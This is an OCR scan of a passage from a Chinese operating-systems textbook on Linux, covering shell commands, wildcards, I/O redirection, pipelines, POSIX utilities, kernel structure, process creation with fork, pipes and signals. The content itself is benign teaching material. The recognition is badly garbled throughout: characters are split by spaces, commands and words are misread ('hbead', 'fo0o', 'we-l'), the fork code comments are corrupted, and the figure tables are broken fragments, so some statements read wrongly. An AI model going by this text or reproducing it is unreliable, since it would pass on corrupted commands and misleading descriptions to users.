需要 从 键盘 读 取 数 据 、 同 显示 志和 输出 数据 和 运行 其 他 程序 的 能 
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命令 中 还 可 以 包含 参数 ， 它 们 作为 字符 串 传 给 所 调用 的 程序 。 比 


cp src dest 


调用 cp 程序 并 包含 两 个 参数 ，src 和 dest。 这 个 程序 将 第 一 个 参数 
解释 为 一 个 现存 的 文件 名 ， 然 后 创建 该 文件 的 一 个 副本 ， 其 名 称 为 


dest ° 
并 不 是 所 有 的 参数 都 是 文件 名 。 在 命令 行 
head -20 file 
中 ， 第 一 个 参数 -20 通 知 hbead 程 序 输 出 fle 中 的 前 20 行 ， 而 不 是 默 
认 的 10 行 。 人 负责 控制 一 个 命令 的 操作 或 者 指定 一 个 可 选 数值 的 参数 称 


为 标志 (flag) ,习惯 上 由 一 个 破 折 号 标记 。 为 了 避免 上 收 义 ， 这 个 破 
折 号 是 必要 的 ， 比 如 


head 20 file 


全 合法 的 命令 ， 它 告诉 head 程 序 输出 文件 名 为 20 的 文件 
的 前 10 行 ， 然 后 输出 文件 名 为 ie 的 文件 的 前 10 行 。 大 多 数 Linux 命 令 


接受 多 个 标志 和 多 个 参数 。 
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为 了 更 容易 地 指定 多 个 文件 名 ，shell 文 持 魔 法 字符 ， 有 时 称 为 通 
配 符 。 比 如 ， 一 个 星 号 可 以 匹配 所 有 可 能 的 字符 串 ， 因 此 


告诉 ls 列举 出 所 有 文件 名 以 .c 结 束 的 文件 。 如 果 同 时 存在 文件 


x.C，yYC，Z.C， 那 么 上 述 命 令 等 价 于 下 面 的 命令 


ls X.C y.C Z.C 


另 一 个 通配符 是 问号 ， 负 责 匹 配 任意 一 个 字符 。 一 组 在 中 括号 中 


的 字符 可 以 表示 其 中 的 任意 一 个 ， 因 此 


ls[ape]* 


列举 出 所 有 以 “a”,“p? 或 者 “e" 开 头 的 文件 。 


像 shell 这 样 的 程序 不 一 定 非 要 通过 终端 (键盘 和 显示 器 ) 进行 输 
入 输出 。 当 它 (或 者 任何 其 他 程序 ， 启 动 时 ， 它 目 动 获得 了 对 标准 输 
入 (负责 正常 输入 ) ， 标 准 输出 (负责 正常 输出 和 标准 错误 (人 负责 
输出 错误 信息 ) 文件 进行 访问 的 能 力 。 正 常情 况 下 ， 上 述 三 个 文件 默 
认 地 都 指 癌 终端 ， 因 此 标准 的 输出 是 从 键 一 输入 的 ， 而 标准 输出 或 者 
标准 错误 是 输出 到 显示 器 的 。 许 多 Linux 程 序 默认 从 标准 输入 进行 输入 
并 从 标准 输出 进行 输出 。 比 如 


sort 


调用 sort 程 序 ， 其 从 终端 读 取 数据 (直到 用 户 输入 Ctrl-D 表 示 文 件 
结束 ) ， 根 据 字母 顺序 将 它们 排序 ， 然 后 将 结果 输出 到 屏幕 上 。 


也 可 以 对 标准 输入 和 输出 进行 重 定 位 ， 因 为 这 种 情况 通常 会 很 有 
用 。 对 标准 输入 进行 重 定位 的 语法 使 用 一 个 小 于 号 (<) 加 上 紧 接 的 
一 个 输入 文件 名 。 类 似 的 ， 标 准 输出 可 以 通过 一 个 大 于 号 (>) 进行 
重 定位 。 人 允许 在 一 个 命令 中 对 两 者 同时 进行 重 定位 。 比 如 ， 下 面 的 合 
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sort<in>out 


使 得 sort 从 文件 im 中 得 到 输入 ， 并 把 结果 输出 到 文件 out 中 。 由 于 
标准 错误 没有 被 重 定位 ， 因 此 所 有 的 错误 信息 会 输出 到 屏幕 中 。 
从 标准 输入 中 读 取 数据 ， 对 数据 进行 某 种 处 理 ， 然 后 输出 到 标准 输出 
的 程序 称 为 过 滤器 (filter) ° 


考虑 下 面 一 条 包括 三 条 独立 命令 的 命令 4 


证 


sort<in>temp;head-30<temp;rm temp 


首先 它 运 行 sort， 从 in 得 到 输入 然后 将 结果 输出 到 temp 中 。 完 成 
后 ，shell 运 行 head， 令 其 将 temp 的 前 30 行 内 容 输 出 到 标准 输出 中 ， 默 
认为 终端 。 最 后 ， 临 时 文件 temp 被 删除 。 
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情况 。 在 上 面 的 例子 中 ， 我 们 使 用 temp 文 件 来 保存 这 个 输出 。 然 而 ， 
Linux 提 供 了 一 种 更 简单 的 方法 来 达到 相同 的 结果 。 在 命令 行 


sort<in|head-30 


EAL, tha RR AFF (pipe symbol) ， 告 诉 程序 从 sort 中 
得 到 输出 并 且 将 其 作为 输入 传 给 head， 由 此 消除 了 创建 、 使 用 和 删除 
一 个 临时 文件 的 过 程 。 由 管道 符 连 接 起 来 的 命 仿 ， 称 为 一 个 管线 
(pipeline) ， 可 以 包含 任意 多 的 命令 。 一 个 由 四 个 部 分 组 成 的 管线 如 
BARA: 


grep ter*.t|sort|head-20|tail-5>fo0o 


这 里 所 有 以 结尾 的 文件 中 包含 “ter” 的 行 被 写 到 标准 输出 中 ， 然 后 
被 排序 。 这 些 内 容 的 前 20 行 被 head 选 择 出 来 并 传 给 tail， 它 又 将 最 后 5 
47 〈 也 即 排 完 序 的 列表 中 的 第 16 到 20 行 ) 传 给 foo。 这 个 例子 显示 了 
Linux 征 如 何 提供 了 一 组 各 负责 一 项 任务 的 基本 单元 (一 些 过 滤器 ) 和 
一 个 几乎 可 以 用 无 穷 的 方式 把 它们 组 合 起 来 的 机 制 。 


Linux 是 一 种 通用 多 道 程 序 设计 系统 。 一 个 用 户 可 以 同时 运行 多 个 
程序 ， 每 一 个 作为 一 个 独立 的 进程 存在 。 在 shell 中 ， 后 台 运 行 一 个 程 
序 的 语法 是 在 原本 命令 后 加 一 个 “&”。 因 此 


we-l<a>b& 


运行 字数 统计 程序 wc， 来 统计 输入 文件 a 中 的 行 数 (-] 标 志 ) ， 并 
将 结 采 输出 到 b 中 ， 不 过 整个 过 程 都 在 后 台 运 行 。 命 令 一 被 输入 ，shell 
输出 提示 符 束 可 以 接收 并 处 理 下 一 条 命令 。 管 线 也 可 以 在 后 台中 运 
行 ， 比 如 下 面 的 指令 


sort<x|head& 


多 个 管线 也 可 以 同时 在 后 台中 运行 。 


10.2.4 Linux 应 用 程序 

Linux 的 命令 行 (shell) 用 户 界面 包含 大 量 的 标准 应 用 程序 。 这 些 
程序 可 以 大 致 分 成 以 下 6 类 : 

1) 文 件 和 目录 操作 命令 

2) 过 滤器 。 

3) 程 序 设计 工具 ， 如 编辑 器 和 编译 器 。 

4) 文 档 处 理 。 

5) 系 统管 理 

6) 其 他 。 


POSIX 1003.2 标 准 规定 了 100 种 左右 关于 上 述 程序 的 语法 和 语义 ， 
主要 是 前 三 类 中 的 程序 。 让 这 些 程序 具有 统一 的 标准 主要 是 为 了 实现 
让 任何 人 写 的 shel 脚 本 可 以 在 任何 Linux 系 统 上 运行 。 


除了 这 些 标 准 应 用 程序 外 ， 当 然 还 有 许多 其 他 应 用 程序 ， 比 如 
Web 浏 时 器 ， 图 片 浏览 右 等 。 


下 面 我 们 看 一 看 一 些 程序 的 例子 ， 首 先 从 文件 和 目录 操作 开始 。 


cp ab 


将 文件 a 移 动 到 b， 而 不 改变 原文 件 。 相 比 之 下 


mv ab 


将 文件 a 移 动 到 b 但 旦 删除 原文 件 。 从 效 末 上 来 看 ， 它 征文 件 移动 
不 是 通常 意义 上 的 复制 。cat 命 令 可 以 把 多 个 文件 的 内 容 连 接 起 来 ， 
读 入 每 一 个 输入 文件 然后 把 它们 按 顺 序 复制 到 标准 输出 中 。 可 以 通 
rm 命令 来 删除 文件 。 命令 chmod 可 以 让 属 主 通过 修改 文件 的 权限 位 
来 改变 其 访问 权限 。 使 用 mkdir 和 rmdir 命 令 可 以 分 别 实现 目录 的 创建 
和 删除 。 为 了 列 出 一 个 目 孙 下 的 文件 ， 可 以 使 用 ls 命令 。 它 包含 大 量 
的 标志 来 控制 要 显示 文件 的 哪些 特征 (如 大 小 、 用 户 、 群 、 创 建 日 

期 )、 决 定 文件 的 显示 顺序 (如 字母 序 、 修 改 日 期 逆序) 、 指 定 文 
件 输出 格式 等 。 
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我 们 已 经 见 到 了 很 多 过 滤器 : grep 从 标准 输入 或 者 一 个 或 多 个 输 
入 文件 中 提取 包含 特定 模式 的 行 ，sort 将 输入 进行 排序 并 输出 到 标准 输 
H; head 提 取 输 入 的 前 几 行 ，tail 提 取 输 入 的 后 几 行 。 其 他 的 由 1003.2 
定义 的 过 滤器 有 : cut 和 paste， 它 们 实现 一 段 文 档 的 剪 切 和 粘贴 ，od 将 
输入 (通常 是 二 进 制 ) 转换 成 ASCII 文 档 ， 包 括 八 进 制 ， 十 进 制 或 者 
十 六 进 制 ，tr 实 现 字 符 大 小 写 转换 (如 小 写 换 大 写 ) ，pr 为 打印 机 格式 
化 输出 ， 包 括 一 些 格式 选项 ， 如 运行 头 ， 页 码 等 。 


编译 器 和 程序 设计 工具 包括 gcc ( 它 调用 C 语 言 编译 器 ) 以 及 ar 
( 它 将 库 函 数 收集 到 存档 文件 中 ) 。 


另外 一 个 重要 的 工具 是 make， 它 负 贡 维护 大 的 程序 ， 这 些 程序 的 
源码 通常 分 布 在 多 个 文件 中 。 通 常 ， 其 中 一 些 文件 是 头 文件 (header 
file) ， 其 中 包括 类 型 、 变 量 、 宏 和 其 他 声明 。 源 文件 通常 使 用 include 
将 头 文件 包 仿 进来。 这样， 两 个 或 更 多 的 源 文件 可 以 共 至 同样 的 声 
明 。 然 而 ， 如 果 头 文件 被 修改 ， 束 需要 找到 所 有 依赖 于 这 个 头 文件 的 
源 文件 并 对 它们 重新 进行 编译 。make 的 作用 是 跟踪 哪些 文件 依赖 于 哪 
些 头 文件 等 ， 然 后 安排 所 有 需要 进行 的 编译 目 动 进行 。 几 乎 所 有 的 
Linux 程 序 ， 除 了 最 小 的 那些 ， 都 是 依靠 make 进 行 编译 的 。 


一 部 分 POSIX 标 准 应 用 程序 列 在 图 10-2 中 ， 包 括 每 个 程序 的 简要 
说 明 。 所 有 Linux 系 统 中 都 有 这 些 程序 以 及 许多 其 他 标准 的 应 用 程序 。 


将 多 个 文件 连接 到 标准 输出 

修改 文件 保护 模式 

复制 一 个 或 多 个 文件 

从 一 个 文件 中 剪 切 一 段 文字 

在 文件 中 检索 给 定 模式 

提取 文件 的 前 几 行 

pis | HB 好 S 
编译 文件 生成 二 进 制 文件 

od | 以 八进制 显示 一 个 文件 

将 一 段 文字 粘贴 到 一 个 文件 中 

为 打印 格式 化 文件 

ps ”| 列 出 正在 运行 的 进程 

删除 一 个 或 多 个 文件 

删除 一 个 目录 

对 文件 中 的 所 有 行 按照 字母 序 进行 排序 
提取 文件 的 最 后 几 行 

在 字符 集 之 间 转 换 


10-2 ” POSIX 定义 的 一 些 常 见 的 Linux 应 用 程序 


程 序 典型 应 用 
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10.2.5 “内核 结构 


在 图 10-1 中 我 们 看 到 了 Linux 系 统 的 总 体 结构 。 在 进一步 研究 内 核 
的 组 成 部 分 ， 如 进程 调度 和 文件 系统 之 前 ， 我 们 先 从 整体 的 角度 看 一 
下 Linux 的 内 核 。 


内 核 坐 落 在 硬件 之 上 ， 人 负责 实现 与 VO 设备 和 存储 管理 单元 的 交 
互 ， 并 控制 CPU 对 前 述 设 备 的 访问 。 如 图 10-3 所 示 ， 在 最 属 层 ， 内 核 包 
含 中 断 处 理 程序 ， 它 们 是 与 设备 交互 的 主要 方式 ， 以 及 底层 的 分 派 机 
制 。 这 种 分 派 在 中 断 时 发 生 。 压 层 的 代码 中 止 正在 运行 的 进程 ， 将 其 
状态 存储 在 内 核 进程 结构 中 ， 然 后 启动 相应 的 驱动 程序 。 进 程 分 派 也 
在 内 核 完成 条 些 操作 ， 并 且 需 要 再 次 局 动 一 个 用 户 进 程 时 发 生 。 进 程 
分 派 的 代码 是 汇编 代码 ， 并 且 和 进程 调度 代码 有 很 大 不 同 。 


IO 部 件 内 存 管 理 部 件 进程 管理 部 件 


套 接 字 | | 文件 系统 

aj m 进程 /线程 
网 络 通用 块 层 ee 
协议 ee 


字符 设备 | | 网 络 设备 | | 块 设备 页 面 缓存 CPU 调度 
a 7 ' > as 
驱动 驱动 驱动 


i= 
|= 
= 
| = 
一 


和 


图 10-3 Linux 内 核 结 构 


接 下 来 ， 我 们 将 内 核子 系统 分 为 三 个 主要 部 件 。 在 图 10-3 中 IO 部 
件 包 含 所 有 负责 与 设备 交互 以 及 实现 联网 和 存储 的 IO 功能 的 内 核 部 
件 。 在 最 高 层 ， 这 些 MO 功 能 全 部 整合 在 一 个 虚拟 文件 系统 层 中 。 也 就 
征 说 ， 从 顶层 来 看 ， 对 一 个 文件 进行 读 操 作 ， 不 论 是 在 内 存 还 是 磁盘 
中 ， 都 和 从 终端 输入 中 读 取 一 个 字符 是 一 样 的 。 从 底层 来 看 ， 所 有 的 
1/O 操 作 都 要 通过 茶 一 个 设备 驱动 器 。 所 有 的 Linux 驱 动 程序 都 可 以 被 分 
类 为 字符 驱动 程序 或 块 驱动 程序 ， 两 者 之 间 的 主要 区 别 是 块 设备 允许 
查找 和 随机 访问 而 字符 设备 不 允许 。 从 技术 上 讲 ， 网 络 设备 实 际 上 是 


字符 设备 ， 不 过 它们 的 处 理 和 其 他 字符 设备 不 太一 样 ， 因 此 为 了 清晰 
起 见 将 它们 单独 分 类 ， 如 图 10-3 所 示 。 


在 设备 驱动 程序 之 上 ， 每 个 设备 类 型 的 内 核 代码 都 不 一 样 。 字 符 
设备 有 两 种 不 同 的 使 用 方式 。 有 些 程序 ， 如 可 视 编 辑 器 vi，emacs 等 ， 
需要 每 一 个 键盘 输入 。 原 始 的 终端 (tty) IO 可 以 实现 这 种 功能 。 其 他 
程序 ， 比 如 shell 等 ， 是 面向 行 的 ， 因 此 允许 用 户 在 输入 回 车 并 将 字符 
捉 发 送 给 程序 之 前 整 行 地 进行 编辑 。 在 这 种 情况 下 ， 由 终端 流出 的 字 
符 流 需要 通过 一 个 所 谓 的 行规 则 ， 其 中 的 内 容 补 相应 地 格式 化 。 


网 络 软件 通常 古 模 块 化 的 ， 由 不 同 的 设备 和 协议 来 文 持 。 网 络 设 
备 的 上 一 个 层次 负责 一 种 常规 程序 ， 确 保 每 一 个 包 被 送 到 正确 的 设备 
或 协议 处 理 絮 。 大 多 数 Linux 系 统 在 内 核 中 包含 一 个 完整 的 硬件 路 由 右 
的 功能 ， 尽 管 其 性 能 比 硬 件 路 由 右 的 性 能 甘 一 些 。 在 路 由 右 代 码 之 上 
的 是 实际 的 协议 栈 ， 它 总 是 包含 IP 和 和 TCP 协议， 也 包含 一 些 其 他 协议 。 
在 整个 网 络 之 上 的 是 socket 接 口 ， 它 允许 程序 来 为 特定 的 网 络 和 协议 创 
建 socket， 并 为 每 一 个 socket 返 回 一 个 待 用 的 文件 描述 符 。 


在 磁盘 张 动 器 之 上 是 IO 调度 器 ， 它 负责 排序 和 分 配 磁盘 读 写 操 
作 ， 以 尽 可 能 减少 磁头 的 无 用 移动 或 者 满足 一 些 其 他 的 系统 原则 为 方 


法 。 


块 设备 列 的 最 顶层 是 文件 系统 。Linux 人 允许 ， 也 确实 有 多 个 文件 系 
统 同 时 存在 。 为 了 向 文件 系统 的 实现 隐藏 不 同 硬件 设备 体系 之 间 的 区 
别 ， 一 个 通用 的 块 设备 层 提供 了 一 个 可 以 被 所 有 文件 系统 使 用 的 抽 
B o 
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储 和 进程 管理 任务 。 存 储 管理 任务 包括 维护 虚拟 内 存 到 物理 内 存 的 映 
出， 维护 最 近 人 被 访问 页 面 的 缓存 以 及 实现 一 个 好 的 页 面 鞋 换算 法 ， 并 
且 根 据 需 要 把 需要 的 数据 和 代码 页 读 和 内存 中 。 


进程 管理 部 件 的 最 主要 任务 是 进程 的 创建 和 终止 。 它 还 包括 一 个 
进程 调度 器 ， 人 负责 选择 下 一 步 运 行 哪个 进程 或 线程 。 我 们 将 在 下 一 市 
看 到 ，Linux 把 进程 和 线程 简单 地 看 作 可 运行 的 实体 ， 并 使 用 统一 的 调 
度 策 略 对 它们 进行 调度 。 最 后 ， 信 和 号 处 理 的 代码 也 属于 进程 管理 部 
人 


尽管 这 三 个 部 件 在 图 中 被 分 开 ， 实 际 上 它们 高 度 相互 依赖 。 文 件 
系统 一 般 通 过 块 设备 进行 文件 访问 。 然 而 ， 为 了 隐藏 磁盘 读 取 的 严重 
延迟 ， 文 件 补 复制 到 内 存 中 的 页 缓存 中 。 有 些 文件 甚至 可 能 是 动态 创 
建 的 并 且 只 在 内 存 中 存在 ， 比 如 提供 运行 时 资源 使 用 情况 的 文件 。 男 
外 ， 当 需要 清空 一 些 页 时 ， 虚 拟 存储 系统 可 能 依靠 一 个 磁盘 分 区 或 者 
文件 内 的 交换 区 来 备份 内 存 的 一 部 分 ， 因 此 依赖 于 MO 部 件 。 当 然 ， 还 
存在 着 很 多 其 他 的 组 件 之 间 的 相互 依赖 。 


除了 内 核 内 的 静态 部 件 外 ，Linux 文 持 动态 可 装载 模块 。 这 些 模块 
可 以 用 来 补充 或 者 替换 缺 省 的 设备 驱动 程序 、 文 件 系 统 、 网 络 或 者 其 
他 内 核 代 码 。 在 图 10-3 中 没有 显示 这 些 模块 。 


最 后 ， 处 在 最 顶层 的 生 到 内 核 的 系统 调用 接口 。 所 有 系统 调用 者 
来 目 这 里 ， 其 导致 一 个 陷阱 ， 并 将 系统 从 用 户 态 转换 到 受 保 护 的 内 核 
态 ， 继 而 将 控制 权 交 给 上 述 的 内 核 部 件 之 一 。 


10.3 Linux 中 的 进程 


前 面 的 几 个 小 节 是 从 键盘 的 角度 来 看 待 Linux， 也 就 是 说 以 用 户 在 
xterm 窗 口中 所 见 的 内 容 来 看 待 Linux。 我 们 给 出 了 常用 的 shell 命 令 和 标 
准 应 用 程序 作为 例子 。 最 后 ， 以 一 个 对 Linux 系 统 结构 的 简要 概括 作为 
结尾 。 现 在 ， 让 我 们 深入 到 系统 内 核 ， 更 仔细 地 人 研究 Linux 系 统 所 文 持 
的 基本 概念 ， 即 进程 、 内 存 、 文 件 系 统 和 输入 /输出 。 这 些 概念 非常 重 
要 ， 因 为 系统 调用 (到 操作 系统 的 接口 ， 将 对 这 些 概念 进行 操作 。 举 
个 例子 来 说 ，Linux 系 统 中 存在 着 用 来 创建 进程 和 线程 、 分 配 内 存 、 打 
开 文件 以 及 进行 输入 /输出 操作 的 系统 调用 。 


遗憾 的 是 ， 由 于 Linux 系 统 的 版 本 非 第 之 多 ， 各 个 版 本 之 间 均 有 不 
同 。 在 这 一 革 里 ， 我 们 将 握 弃 着 眼 于 某 一 个 Linux 版 本 的 方法 ， 转 而 强 
调 各 个 版 本 的 共通 之 处 。 因 此 ， 在 某 些小 节 中 (特别 是 涉及 实现 方法 
PVT) ， 这 里 讨论 的 内 容 不 一 定 同 样 运用 于 每 个 Linux 版 本 。 


10.3.1 基本 概念 
Linux 系 统 中 主要 的 活动 实体 就 是 进程 。Linux 进 程 与 我 们 在 第 2 章 


所 学 的 经 典 顺序 进程 极为 相似 。 每 个 进程 执行 一 段 独 立 的 程序 并 且 在 
进程 初始 化 的 时 候 拥 有 一 个 独立 的 控制 线程 。 换 句 话 说 ， 每 一 个 进程 


都 拥有 一 个 独立 的 程序 计数 器 ， 用 这 个 程序 计数 器 可 以 追踪 下 一 条 将 
要 被 执行 的 指令 。 一 旦 进程 开始 运行 ，Linux 系 统 将 允许 它 创建 额外 的 
线程 。 


由 于 Linux 是 一 个 多 道 程序 设计 系统 ， 因 此 系统 中 可 能 会 有 多 个 彼 
此 之 间 相 互 独立 的 进程 在 同时 运行 。 而 且 ， 每 一 个 用 户 可 以 同时 开启 
多 个 进程 。 因 此 ， 在 一 个 庞大 的 系统 里 ， 可 能 有 成 百 个 甚至 上 干 个 进 
程 在 同时 运行 。 事实 上 ， 在 大 多 数 单 用 户 的 工作 站 里 ， 即 使 用 户 已 经 
退出 登录 ， 仍 然 会 有 很 多 后 台 进 程 ， 即 守护 进程 (daemon) ， 在 运 
行 。 在 系统 启动 的 时 候 ， 这 些 守 护 进 程 瓯 已 经 被 shell 脚 本 开启 (ER 


iG, “daemon" 是 “demon” 的 另 一 种 拼写 ， 而 demon 是 指 一 个 恶魔 ) o 


计划 任务 (cron daemon) 是 一 个 典型 的 守护 进程 。 它 每 分 钟 运行 
一 次 来 检查 是 否 有 工作 需要 它 完成 。 如 果 有 工作 要 做 ， 它 就 会 将 之 完 
成 ， 然 后 进入 休眠 状态 ， 直 到 下 一 次 检查 时 刻 来 到 。 


在 Linux 系 统 中 ， 你 可 以 把 在 未 来 几 分 钟 、 几 个 小 时 、 几 天 甚至 几 
个 月 会 发 生 的 事件 列 成 时 间 表 ， 所 以 这 个 守护 进程 是 非常 必要 的 。 举 
个 例子 来 说 ， 假 定 一 个 用 户 在 下 周二 的 三 点 钟 要 去 看 牙医 ， 那 么 他 就 
可 以 在 计划 任务 的 数据 库 里 添加 一 条 记录 ， 让 计划 任务 来 提醒 他 ， 比 
如 说 ， 在 两 点 半 的 时 候 。 接 下 来 ， 当 相应 的 时 间 到 来 的 时 候 ， 计 划 任 
务 意识 到 有 工作 需要 它 来 完成 ， 束 会 运行 起 来 并 且 开启 一 个 新 的 进程 
来 执行 提醒 程序 。 


计划 任务 也 可 以 执行 一 些 周期 性 的 活动 ， 比 如 说 在 每 天 凌晨 四 点 
的 时 候 进 行 磁盘 备份 ， 或 者 是 提 醒 健 环 的 用 户 每 年 10 月 31 号 的 时 候 需 
要 为 万 圣 世 储备 一 些 好 吃 的 糖果 。 当 然 ， 系 统 中 还 存在 其 他 的 守护 进 
程 ， 他 们 接收 或 发 送 电子 邮件 、 管 理 打印 队列 、 检 测 内 存 中 和 是否 有 足 
够 的 空 采 页 等 。 在 Linux 系 统 中 ， 和 守护 进程 可 以 直接 实现 ， 因 为 它 不 过 
征 与 其 他 进程 无 关 的 另 一 个 独立 的 进程 而 已 。 


在 Linux 系 统 中 ， 进 程 通过 非常 简单 的 方式 创建 。 系 统 调用 fork 将 
会 创建 一 个 与 原始 进程 完全 相同 的 进程 副本 。 调 用 fork 函 数 的 进程 称 大 
父 进程 ， 新 的 进程 称 为 子 进程 。 父 进程 和 子 进程 都 拥有 目 己 的 私有 内 
存 映像 。 如果 在 调用 fork 函 数 之 后 ， 父 进程 修改 了 属于 它 的 一 些 变 量 ， 
这 些 变 化 对 于 子 进程 来 说 是 不 可 见 的 ， 反 之 亦 然 。 


但 是 ， 父 进程 和 子 进 程 可 以 共享 已 经 打开 的 文件 。 也 束 是 说 ， 如 
果菜 一 个 文件 在 父 进程 调用 fork 芳 数 之 前 下 已 经 打开 了 ， 那 么 在 父 进程 
调用 fork 范 数 之 后 ， 对 于 父 进 程 和 子 进程 来 说 ， 这 个 文件 也 是 打开 的 。 
如 条 父 、 子 进程 中 任何 一 个 进程 对 这 个 文件 进行 了 修改 ， 那 么 对 于 忆 
一 个 进程 而 言 ， 这 些 修 改 都 是 可 见 的 。 由 于 这 些 修 改 对 于 那些 打开 了 
这 个 文件 的 其 他 任何 无 天 进程 来 说 也 是 可 见 的 ， 所 以 ， 在 父 、 了 于 进程 
间 共 享 已 经 打开 的 文件 以 及 对 文件 的 修改 彼此 可 见 的 做 法 也 是 很 正常 
的 :3 


事实 上 ， 父 、 子 进程 的 内 存 映 像 、 变 量 、 寄 存 器 以 及 其 他 所 有 的 
东西 都 是 相同 的 ， 这 就 产生 了 一 个 问题 ， 该 如 何 区 别 这 两 个 进程 ， 即 
哪 一 个 进程 该 去 执行 父 进程 的 代码 ， 哪 一 个 进程 该 去 执行 子 进程 的 代 
码 呢 ? 秘 窗 在 于 fork 系 统 调用 给 子 进程 运 回 一 个 零 值 ， 而 给 父 进 程 返 回 
一 个 非 零 值 。 这 个 非 零 值 是 子 进程 的 进程 标识 符 (Process Identifier, 
PID) 。 两 个 进程 检验 fork 函 数 的 返回 值 ， 并 且 根 据 返 回 值 继续 执行 ， 
如 图 10-4 所 示 。 


pid = fork( ); /# 如 果 创 建成 功 ， 则 父 进程 pid>0#/ 
if (pid < 0) { 
handle_error(); FEJERE CEG RAN FF BR EE Pe Hit HH) */ 
} else if (pid > 0) { 
/这 里 是 父 进 程 的 代码 */ 
} else { 


} 


计 这 里 是 子 进程 的 代码 */ 


图 10-4 Linux 中 的 进程 创建 


进程 以 其 PID 来 命名 。 如 前 所 述 ， 当 一 个 进程 被 创建 的 时 候 ， 它 的 
父 进程 会 得 到 它 的 PTID。 如 采 子 进程 希望 知道 它 目 己 的 PID， 可 以 调用 
系统 调用 getpid。PID 有 很 多 用 处 ， 举 个 例子 来 说 ， 当 一 个 于 进程 结束 
的 时 候 ， 它 的 父 进程 会 得 到 该 子 进程 的 PID。 这 一 点 非常 重要 ， 因 为 一 
个 父 进程 可 能 会 有 多 个 于 进程。 由 于 了 于 进程 还 可 以 生成 子 进程 ， 那 么 
一 个 原始 进程 可 以 生成 一 个 进程 树 ， 其 中 包含 着 子 进程 、 孙 子 进程 以 
及 关系 更 玖 远 的 后 诊 进 程 。 


Linux 系 统 中 的 进程 可 以 通过 一 种 消息 传递 的 方式 进行 通信 。 在 两 
个 进程 之 间 ， 可 以 建立 一 个 通道 ， 一 个 进程 向 这 个 通道 里 写 入 字 节 
流 ， 另 一 个 进程 从 这 个 通道 中 读 取 字 下 流 。 这 些 通道 称 为 管道 
(pipe)。 使 用 管道 也 可 以 实现 同步 ， 因 为 如 果 一 个 进程 试图 从 一 个 空 
的 管道 中 读 取 数 据 ， 这 个 进程 束 会 被 挂 起 直到 管道 中 有 可 用 的 数据 为 
ies 


shell 中 的 管线 加 是 用 管道 技术 实现 的 。 当 shel 看 到 类 似 下 面 的 一 行 
输入 时 : 


sort<f|head 


它 会 创建 两 个 进程 ， 分 别 是 sort 和 head， 同 时 在 两 个 进程 间 建 立 一 
个 管道 使 得 sort 进 程 的 标准 输出 作为 head 进 程 的 标准 输入 。 这 样 一 来 ， 
sort 进 程 产 生 的 输出 可 以 直接 作为 head 进 程 的 输入 而 不 必 写 入 到 一 个 文 
件 当中 去 。 如 果 管 道 满 了 ， 系 统 会 停止 运行 sort 进 程 直 到 head 进 程 从 管 
道中 删除 一 些 数据 。 


进程 还 可 以 通过 为 一 种 方式 通信 : 软件 中 断 。 一 个 进程 可 以 给 男 
一 个 进程 发 送信 号 (signal) 。 进 程 可 以 告诉 操作 系统 当 信和 号 到 来 时 它 
们 希望 发 生 什 么 事件 。 相 关 的 选择 有 忽略 这 个 信号 、 抓 取 这 个 信和 号 或 
者 利用 这 个 信和 号 杀 死 某 个 进程 (大 部 分 情况 下 ， 这 是 处 理 信 号 的 默认 
方式 ) 。 如 果 一 个 进程 希望 获取 所 有 发 送 给 它 的 信号 ， 它 就 必须 指定 


一 个 信号 处 理 函 数 。 当 信和 号 到 达 时 ， 欣 制 立即 切换 到 信号 处 理 函 数 。 
当 信和 号 处 理 函 数 结束 并 返回 之 后 ， 挖 制 像 硬件 MO 中 断 一 样 返回 到 陷入 
点 处 。 一 个 进程 只 可 以 给 它 所 在 进程 组 中 的 其 他 进程 发 送信 号 ， 这 个 
进程 组 包括 它 的 父 进程 《以 及 远 祖 进程 ) 、 兄 弟 进 程 和 子 进程 (以 及 
后 裔 进程 ) 。 同 时 ， 一 个 进程 可 以 利用 系统 调用 给 它 所 在 的 进程 组 中 
所 有 的 成 员 发 送信 号 。 


信号 还 可 以 用 于 其 他 用 途 。 比 如 说 ， 如 果 一 个 进程 正在 进行 浮 点 
运算 ， 但 是 不 慎 除 数 为 0， 它 就 会 得 到 一 个 SIGFPE 信 号 ( 浮 点 运算 异常 


信号 ) 。POSIX 系 统 定义 的 信号 详 见 图 10-5 所 示 。 很 多 Linux 系 统 会 


目 己 添 加 的 额外 信号 ， 但 是 使 用 了 这 些 信号 的 程序 一 般 情 况 下 将 没有 
办 法 移植 到 Linux 的 其 他 版 本 或 者 UNIX 系 统 


出 现 浮 点 错误 (比如 ， 除 0) 
用 户 按键 要 求 核心 转 储 
进程 写 入 了 无 读者 的 管道 
用 于 要 求 进程 正常 终止 


图 10-5 POSIX 定 义 的 信和 号 


10.3.2 ”Linux 中 进程 管理 相关 的 系统 调用 


现在 来 关注 一 下 Linux 系 统 中 与 进程 管理 相关 的 系统 调用 。 主 要 的 
系统 调用 如 图 10-6 所 示 。 为 了 开始 我 们 的 讨论 ，fork 芳 数 是 一 个 很 好 的 
切入 点 。fork 系 统 调用 是 Linux 系 统 中 创建 一 个 新 进程 的 主要 方式 ， 同 
时 也 被 其 他 传统 的 UNIX 系 统 所 支持 〈 在 下 一 部 分 将 讨论 另 一 种 创建 进 
程 的 方法 ) 。fork 函 数 创建 一 个 与 原始 进程 完全 相同 的 进程 副本 ， 包 括 
相同 的 文件 插 述 符 、 相 同 的 寄存 占 内 容 和 其 他 的 所 有 东西 。fork 函 数 调 
用 之 后 ， 原 始 进程 和 它 的 副本 ( 即 父 进程 和 子 进程 各 循 其 路 。 虽 然 
在 fork 函 数 刚 刚 结束 调用 的 时 候 ， 父 、 子 进程 所 拥有 的 全 部 变量 都 具 有 
相同 的 要 量 值 ， 但 是 由 于 父 进程 的 全 部 地 址 空间 已 经 被 子 进程 完全 复 
制 ， 父 、 子 进程 中 的 任何 一 个 对 内 存 的 后 续 操 作 所 引起 的 变化 将 不 会 
影响 男 外 一 个 进程 。fork 函 数 的 返回 值 ， 对 于 了 于 进程 来 说 ,但 为 0， 对 
于 父 进程 来 说 ， 是 它 所 生成 的 子 进程 的 PTD。 使 用 返回 的 PID， 可 以 区 
分 哪 一 个 进程 是 父 进程 ， 哪 一 个 进程 是 子 进程 。 


系统 调用 
|pid=fork () E 


[pid=waitpid (pid,&statloc,opts) 
(name,argv,envp) 
exit (status) 7 
s=sigaction (sig,&act,&oldact) 
s=sigreturn (&context) 


s=sigprocmask (how,&set,&old) 


创建 一 个 与 父 进程 - 
守 行 于 进程 终止 
PEGE RLM Gb RR 
终止 进程 运行 并 返回 状态 值 
定义 信号 处 理 的 动作 
